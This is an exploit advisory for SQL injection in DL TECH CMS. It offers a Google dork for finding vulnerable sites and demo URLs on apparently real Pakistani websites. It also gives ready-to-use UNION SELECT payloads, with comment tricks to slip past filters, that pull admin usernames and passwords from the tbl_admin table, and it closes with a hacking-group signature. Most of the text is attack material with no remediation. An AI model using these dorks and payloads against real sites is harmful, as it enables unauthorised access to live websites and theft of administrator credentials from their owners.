===================================================================================
Exploit Title: DL TECH CMS SQL Injection
===================================================================================
# Google Dork: site:.pk intext:"Designed & Developed By: DL TECH" inurl:".php?"
===================================================================================
# Exploit Author: Ashiyane Digital Security Team
===================================================================================
# Vendor Homepage: http://dltech.pk/
===================================================================================
# Tested On : All versions
===================================================================================
# Demo1 : http://lonXve.com.pk/basket.php?sizeid=0&qty=1&Pid=180'
# Demo2 : http://arXlan.pk/products.php?MID=1&SID=22'
# Demo3 : http://floXk/products.php?MID=2&SID=34'
===================================================================================
# Example :
http://fteXm.pk/about.php?id=-s'+/*!50000union*/+select+1,2,/*!(usrname)*/,4,5,6,7,8,9,10,11,12,13,14,15+from+ftecom_ftedbs.tbl_admin--+
http://fteXm.pk/about.php?id=-s'+/*!50000union*/+select+1,2,/*!(password)*/,4,5,6,7,8,9,10,11,12,13,14,15+from+ftecom_ftedbs.tbl_admin--+
===================================================================================
# Injection Help : Important Table Is 'tbl_admin' And Columns Are 'usrname' AND 'password'
===================================================================================
# contact me : injectable@rogers.com
InJecTable Was Here ... Hamedan Bax !
===================================================================================